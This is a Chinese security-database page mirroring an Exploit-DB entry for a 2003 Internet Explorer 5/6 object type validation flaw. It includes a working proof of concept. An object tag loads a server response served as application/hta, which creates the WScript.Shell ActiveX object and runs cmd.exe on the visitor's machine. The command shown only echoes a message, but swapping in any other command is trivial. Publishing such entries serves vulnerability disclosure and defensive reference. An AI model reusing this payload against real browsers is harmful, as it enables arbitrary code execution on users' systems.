Microsoft Internet Explorer 5/6 – Object Type Validation

Microsoft Internet Explorer 5/6 – Object Type Validation

漏洞ID 1054109 漏洞类型
发布时间 2003-08-20 更新时间 2003-08-20
图片[1]-Microsoft Internet Explorer 5/6 – Object Type Validation-安全小百科CVE编号 N/A
图片[2]-Microsoft Internet Explorer 5/6 – Object Type Validation-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23044
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8456/info

The problem occurs when Internet Explorer receives a response from the server when a web page containing an object tag is parsed. Successful exploitation of this vulnerability could allow a malicious object to be trusted and as such be executed on the local system. All code execution would occur in the security context of the current user. 

--------------Client HTTP request---------------------------
<html>
...
<object data="www.yourinternethost.com/yourexploitwebpageorcgi.html">
</object>
</html>
------------------------------------------------------------

-------------Server HTTP Response---------------------------
HTTP/1.1 200 OK
Date: Tue, 13 May 2003 18:06:43 GMT
Server: Apache
Content-Type: application/hta
Content-Length: 191

<html>
<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("cmD.exe /k echO so loNg, and ThaNks For all yoUr EmplOyeeS");
</script>
</html>
------------------------------------------------------------

相关推荐: PHPSlash URL Block Arbitrary File Disclosure Vulnerability

PHPSlash URL Block Arbitrary File Disclosure Vulnerability 漏洞ID 1103325 漏洞类型 Input Validation Error 发布时间 2001-04-15 更新时间 2001-04-1…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享